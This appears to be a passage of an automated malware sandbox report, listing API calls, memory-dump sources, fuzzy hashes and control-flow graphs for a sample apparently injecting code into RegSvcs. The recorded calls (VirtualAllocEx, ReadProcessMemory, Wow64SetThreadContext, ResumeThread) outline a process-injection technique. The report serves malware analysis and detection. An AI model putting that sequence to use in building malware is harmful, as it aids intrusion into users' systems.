                                                              • Instruction ID: faa9bdc54ec2aca43a412dcefbaea33b887048803d493b814121e0211c9aeef1
                                                              • Opcode Fuzzy Hash: af63903d9ee386e0cbc0179a9a81ab6af718f825093606fd3b1fadbdb672e454
                                                              • Instruction Fuzzy Hash: EB2138B1D003099FDB10DFAAC4857EEBBF5EF48324F54842AD559A7240CB78A945CFA4
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073ADF70
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 3dd5a7766200360e6a6f94fa5a3e404df852b36d85d8f2b7d45a4e650b48f94d
                                                              • Instruction ID: eaa73431481f883d257b1c51637b43877401bcc97efc9af7f359f63099727a1f
                                                              • Opcode Fuzzy Hash: 3dd5a7766200360e6a6f94fa5a3e404df852b36d85d8f2b7d45a4e650b48f94d
                                                              • Instruction Fuzzy Hash: C72148B1D003499FDB10DFAAC841BEEBBF5FF48310F50842AE918A7640C7399941CBA4
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073AD4AE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073ADF70
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0157D897
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073AD9AE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073AD9AE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0157B17E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0BFB18A5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1530340710.000000000BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_bfb0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0BFB18A5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1530340710.000000000BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_bfb0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499827662.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_130d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499949794.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_131d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499949794.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_131d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499827662.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_130d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499949794.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_131d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499949794.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_131d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:

                                                              Execution Graph

                                                              Execution Coverage:0.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:5
                                                              Total number of Limit Nodes:1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 1402c0a-1402c0f 1 1402c11-1402c18 0->1 2 1402c1f-1402c26 LdrInitializeThunk 0->2
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(0141FD4F,000000FF,00000024,014B6634,00000004,00000000,?,-00000018,7D810F61,?,?,013D8B12,?,?,?,?), ref: 01402C24
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 4 1402b60-1402b6c LdrInitializeThunk
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(01430DBD,?,?,?,?,01424302), ref: 01402B6A
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5 1402df0-1402dfc LdrInitializeThunk
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(0143E73E,0000005A,0149D040,00000020,00000000,0149D040,00000080,01424A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0140AE00), ref: 01402DFA
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
                                                              • Instruction ID: f5e6ed4886cc5ef95be3475614219ccbdc8723122e8b6fd04ba2f711a0c1abc2
                                                              • Opcode Fuzzy Hash: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
                                                              • Instruction Fuzzy Hash: 6590023224140513D11171584504707100997E1281F95C413A0424559DD7668A52A221

                                                              Control-flow Graph

                                                              control_flow_graph 6 14035c0-14035cc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
                                                              • Instruction ID: 40f2871b52f63c88f4cc1c547e67aebb1aa290b211a99a4ba27bdc265d11c441
                                                              • Opcode Fuzzy Hash: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
                                                              • Instruction Fuzzy Hash: 4190023264550503D10071584514706200597E1241F65C412A0424569DC7A58A5166A2

                                                              Control-flow Graph

                                                              control_flow_graph 19 42e443-42e484 call 42e933 23 42e486-42e4a3 19->23 24 42e4de-42e4e3 19->24 26 42e4b6-42e4db 23->26 27 42e4a5-42e4ad 23->27 26->24 28 42e4b3 27->28 28->26
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                              • Instruction ID: 4366241f30172668ac266cf9dbbaaf2ab3a96406b79bd4ea90d7b1ecfc278b4f
                                                              • Opcode Fuzzy Hash: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                              • Instruction Fuzzy Hash: 6B017971D0122866FB60EB95AC42FD973B89B08315F4006DAF50CA25C1FF74A78C8A55

                                                              Control-flow Graph

                                                              control_flow_graph 7 42e43e-42e45a 8 42e469-42e470 7->8 9 42e464 call 42e933 7->9 10 42e47f-42e484 8->10 9->8 11 42e486-42e48f 10->11 12 42e4de-42e4e3 10->12 13 42e49e-42e4a3 11->13 14 42e4b6-42e4db 13->14 15 42e4a5-42e4ad 13->15 14->12 16 42e4b3 15->16 16->14
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                              • Instruction ID: 404c73420e7ccc61c58b20341cebbccbd52cb142bdd450d9b6ac3c885e858c85
                                                              • Opcode Fuzzy Hash: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                              • Instruction Fuzzy Hash: 42019671D021246AFB60EB95AC42FDDB3B49B08305F400ADAE508A2581EF78A7888B55

                                                              Control-flow Graph

                                                              control_flow_graph 31 42e7f7-42e801 32 42e803-42e82e 31->32 33 42e834-42e845 32->33
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                              • Instruction ID: 31242dfcbd3f96dd699b4558cde109ee15ad417a935ac94cd5934c0012438835
                                                              • Opcode Fuzzy Hash: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                              • Instruction Fuzzy Hash: C0F03A7661030AAFDB04CF55D885EEBB3ADBB88350F44C219FD198B641EB75E910CBA0

                                                              Control-flow Graph

                                                              control_flow_graph 34 42e969-42e988 35 42e98e-42e995 34->35 36 42e997-42e999 35->36 37 42e9a9-42e9ac 35->37 36->37 38 42e99b-42e9a7 call 42e933 36->38 38->37
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                              • Instruction ID: 9450f4893f1b544faf21d748d5bf1faa69d539990d9b7b546b78aef50944f596
                                                              • Opcode Fuzzy Hash: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                              • Instruction Fuzzy Hash: 25E09B72F412246BD7209666AC05FABB768DFD1760F18007FFD0897341E175585087D9

                                                              Control-flow Graph

                                                              control_flow_graph 43 42e973-42e988 44 42e98e-42e995 43->44 45 42e997-42e999 44->45 46 42e9a9-42e9ac 44->46 45->46 47 42e99b-42e9a7 call 42e933 45->47 47->46
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                              • Instruction ID: b45b16270b7c92ecc088d3bbc55ba942c8e19ef5250ac7cf6bfce4062317808b
                                                              • Opcode Fuzzy Hash: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                              • Instruction Fuzzy Hash: 04E0D87270022427D620554AAC05FAB735C9FC0B20F48002BFE0897301D164A84082E9

                                                              Control-flow Graph

                                                              control_flow_graph 41 42e803-42e82e 42 42e834-42e845 41->42
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                              • Instruction ID: ed3f3c4a1f71d5893b28c54a4458e4a2cb9e16b5f970c0aa03921f96b0cc64a3
                                                              • Opcode Fuzzy Hash: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                              • Instruction Fuzzy Hash: EFF098B6610209AFDB04CF59D885EEB73A9BB88750F048559FD198B241D774EA108BA1

                                                              Control-flow Graph

                                                              control_flow_graph 50 42e893-42e8a6 51 42e8ac-42e8b0 50->51
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1650706101.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_42e000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                              • Instruction ID: 3eca5127519bf68b1d5e67e2a562a6eab0631c4a37908332f397cdab7da05a69
                                                              • Opcode Fuzzy Hash: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                              • Instruction Fuzzy Hash: 9AC012716002086BDB00DA88DC46F66339C9748610F444455B91C8B241D571B9504698

                                                              Control-flow Graph

                                                              control_flow_graph 52 1404a80-1404a8b 53 1404a8d-1404a99 RtlDebugPrintTimes 52->53 54 1404a9f-1404aa6 52->54 53->54 59 1404b25-1404b26 53->59 55 1404aa8-1404aae 54->55 56 1404aaf-1404ab6 call 13ef5a0 54->56 61 1404b23 56->61 62 1404ab8-1404b22 call 13f1e46 * 2 56->62 61->59 62->61
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0Ivw$0Ivw$0Ivw$0Ivw$0Ivw$0Ivw
                                                              • API String ID: 3446177414-4119021165
                                                              • Opcode ID: 6d82698262fc0b2c7e8818e0a914f603aa3fd8ea6b9e706ff6b31cab079df5e0
                                                              • Instruction ID: a96151b2b260a5d715bff013d83706363027af788f882e65160c21e1f5cf3146
                                                              • Opcode Fuzzy Hash: 6d82698262fc0b2c7e8818e0a914f603aa3fd8ea6b9e706ff6b31cab079df5e0
                                                              • Instruction Fuzzy Hash: 820144F19056146BE7219B2DF4C47862AA1B78672CF09006BEB089B2F4D7704841E7A0

                                                              Control-flow Graph

                                                              control_flow_graph 263 1402890-14028b3 264 14028b9-14028cc 263->264 265 143a4bc-143a4c0 263->265 267 14028dd-14028df 264->267 268 14028ce-14028d7 264->268 265->264 266 143a4c6-143a4ca 265->266 266->264 271 143a4d0-143a4d4 266->271 270 14028e1-14028e5 267->270 268->267 269 143a57e-143a585 268->269 269->267 272 1402988-140298e 270->272 273 14028eb-14028fa 270->273 271->264 274 143a4da-143a4de 271->274 277 1402908-140290c 272->277 275 1402900-1402905 273->275 276 143a58a-143a58d 273->276 274->264 278 143a4e4-143a4eb 274->278 275->277 276->277 277->270 279 140290e-140291b 277->279 280 143a564-143a56c 278->280 281 143a4ed-143a4f4 278->281 282 143a592-143a599 279->282 283 1402921 279->283 280->264 284 143a572-143a576 280->284 285 143a4f6-143a4fe 281->285 286 143a50b 281->286 291 143a5a1-143a5c9 call 1410050 282->291 289 1402924-1402926 283->289 284->264 290 143a57c call 1410050 284->290 285->264 287 143a504-143a509 285->287 288 143a510-143a536 call 1410050 286->288 287->288 303 143a55d-143a55f 288->303 293 1402993-1402995 289->293 294 1402928-140292a 289->294 290->303 293->294 298 1402997-14029b1 call 1410050 293->298 300 1402946-1402966 call 1410050 294->300 301 140292c-140292e 294->301 312 1402969-1402974 298->312 300->312 301->300 306 1402930-1402944 call 1410050 301->306 309 1402981-1402985 303->309 306->300 312->289 314 1402976-1402979 312->314 314->291 315 140297f 314->315 315->309
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID:
                                                              • API String ID: 48624451-0
                                                              • Opcode ID: 49b76da480f514bd446ec6b15101aa0300ef02b93a962733fe7bf915a812d5c1
                                                              • Instruction ID: a6cc80d9846b394ae7afeb41e85ad65c9ce7c92426e7ffe14f82b43fa3666535
                                                              • Opcode Fuzzy Hash: 49b76da480f514bd446ec6b15101aa0300ef02b93a962733fe7bf915a812d5c1
                                                              • Instruction Fuzzy Hash: F351D6B6A00116AFCB12DBAE888497FFBB8BB58240714827BF595D77D1D374DE4087A0

                                                              Control-flow Graph

                                                              control_flow_graph 316 13da250-13da26f 317 13da58d-13da594 316->317 318 13da275-13da291 316->318 317->318 321 13da59a-14279bb 317->321 319 14279e6-14279eb 318->319 320 13da297-13da2a0 318->320 320->319 322 13da2a6-13da2ac 320->322 321->318 326 14279c1-14279c6 321->326 324 13da6ba-13da6bc 322->324 325 13da2b2-13da2b4 322->325 327 13da2ba-13da2bd 324->327 328 13da6c2 324->328 325->319 325->327 329 13da473-13da479 326->329 327->319 330 13da2c3-13da2c6 327->330 328->330 331 13da2c8-13da2d1 330->331 332 13da2da-13da2dd 330->332 333 14279cb-14279d5 331->333 334 13da2d7 331->334 335 13da6c7-13da6d0 332->335 336 13da2e3-13da32b 332->336 338 14279da-14279e3 call 144f290 333->338 334->332 335->336 337 13da6d6-14279ff 335->337 339 13da330-13da335 336->339 337->338 338->319 342 13da47c-13da47f 339->342 343 13da33b-13da343 339->343 344 13da34f-13da35d 342->344 345 13da485-13da488 342->345 343->344 347 13da345-13da349 343->347 348 13da48e-13da49e 344->348 351 13da363-13da368 344->351 345->348 349 1427a16-1427a19 345->349 347->344 350 13da59f-13da5a8 347->350 348->349 354 13da4a4-13da4ad 348->354 352 13da36c-13da36e 349->352 353 1427a1f-1427a24 349->353 355 13da5aa-13da5ac 350->355 356 13da5c0-13da5c3 350->356 351->352 357 1427a26 352->357 358 13da374-13da38c call 13da6e0 352->358 359 1427a2b 353->359 354->352 355->344 360 13da5b2-13da5bb 355->360 361 1427a01 356->361 362 13da5c9-13da5cc 356->362 357->359 369 13da4b2-13da4b9 358->369 370 13da392-13da3ba 358->370 364 1427a2d-1427a2f 359->364 360->352 365 1427a0c 361->365 362->365 366 13da5d2-13da5d5 362->366 364->329 368 1427a35 364->368 365->349 366->355 371 13da3bc-13da3be 369->371 372 13da4bf-13da4c2 369->372 370->371 371->364 373 13da3c4-13da3cb 371->373 372->371 374 13da4c8-13da4d3 372->374 375 1427ae0 373->375 376 13da3d1-13da3d4 373->376 374->339 378 1427ae4-1427afc call 144f290 375->378 377 13da3e0-13da3ea 376->377 377->378 379 13da3f0-13da40c call 13da840 377->379 378->329 384 13da5d7-13da5e0 379->384 385 13da412-13da417 379->385 386 13da601-13da603 384->386 387 13da5e2-13da5eb 384->387 385->329 388 13da419-13da43d 385->388 390 13da629-13da631 386->390 391 13da605-13da623 call 13c4508 386->391 387->386 389 13da5ed-13da5f1 387->389 392 13da440-13da443 388->392 393 13da5f7-13da5fb 389->393 394 13da681-13da6ab RtlDebugPrintTimes 389->394 391->329 391->390 396 13da449-13da44c 392->396 397 13da4d8-13da4dc 392->397 393->386 393->394 394->386 410 